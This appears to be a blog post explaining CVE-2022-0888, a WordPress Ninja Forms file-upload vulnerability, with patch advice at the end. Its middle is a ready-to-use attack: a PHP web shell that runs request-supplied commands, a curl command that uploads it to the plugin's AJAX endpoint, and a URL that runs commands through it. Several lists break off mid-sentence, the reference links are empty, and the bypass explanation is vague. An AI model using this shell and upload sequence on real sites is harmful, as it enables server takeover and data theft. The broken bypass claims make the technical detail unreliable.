In early 2022, a critical vulnerability shook the WordPress ecosystem, affecting websites using the popular Ninja Forms - File Uploads Extension plugin. Labeled as CVE-2022-0888, this flaw allows unauthenticated attackers to upload any file type, slip past weak server checks, and even remotely execute code on the hosting server. In simple words: hackers could take over WordPress sites without needing a login.
This post will break down how CVE-2022-0888 works, explain exploitation with code snippets, and provide essential references. Let’s get started!
What is the Ninja Forms - File Uploads Extension?
Ninja Forms is a widely-used WordPress plugin for building forms—contact forms, application forms, and more. The File Uploads Extension lets users attach files when submitting a form.
Normally, you want to allow common files (like .jpg, .pdf), but block dangerous ones such as .php scripts that can harm your site.
The Issue
The vulnerability lives in:
~/includes/ajax/controllers/uploads.php
This file failed to properly validate file types before saving them. An attacker could cleverly trick the upload logic and place any file type they want on your server—including executable PHP code!
Why does this matter?
Because if you can upload a file like shell.php and then access it, you can make the server do almost anything—list files, delete data, steal credentials, and so on.
Upload a Malicious File
Use a tool like curl or Burp Suite to submit a crafted request. By changing the content-type or filename, you can bypass the plugin’s weak checks.
Access the Uploaded File
The file appears in a public directory, such as /wp-content/uploads/ninja-forms/ or similar. Visit http://victim-site.com/wp-content/uploads/ninja-forms/shell.php to trigger your code.
Below is a sample malicious PHP shell for proof-of-concept
<?php
if(isset($_REQUEST['cmd'])){
echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>
Upload this as shell.php via the vulnerable form.
Example curl Command
curl -F "file=@shell.php" https://victim-site.com/wp-admin/admin-ajax.php?action=ninja_forms_ajax_submit
*(You may need to adjust field names or paths based on form structure.)*
Now, execute a command
Visit:
https://victim-site.com/wp-content/uploads/ninja-forms/shell.php?cmd=whoami
If you see output like www-data, the exploit worked. Threat actors can now run ANY command on the web server!
Why Did the Filter Fail?
In uploads.php, the upload handler tried to block evil files by checking file extensions or mimetype. However, attackers could:
Sample code snippet from a vulnerable upload handler
// Weak file type check (simplified)
$allowed = array('jpg', 'png', 'pdf');
$file_ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
if(in_array($file_ext, $allowed)){
move_uploaded_file($_FILES['file']['tmp_name'], $target_path);
}
This check can be bypassed by a manipulated request, for example using shell.php.png and then removing the .png via a path traversal or upload bug.
Check your plugin version!
### Fix / Patch
Upgrade to the latest version immediately:
Ninja Forms Download Page
The Ninja Forms team quickly patched this in later releases by implementing strict file type validation.
Original Disclosure:
CVE Record:
Plugin Homepage:
Final Thoughts
Arbitrary file upload vulnerabilities are among the most dangerous for WordPress sites. They hand attackers the keys to your hosting server. Always:
Use security plugins and a firewall.
If you manage a WordPress site, patch CVE-2022-0888 now, and regularly review your plugins!
*Stay safe, patch smart, and always validate those uploads!*
Timeline
Published on: 03/23/2022 20:15:00 UTC
Last modified on: 05/02/2022 19:34:00 UTC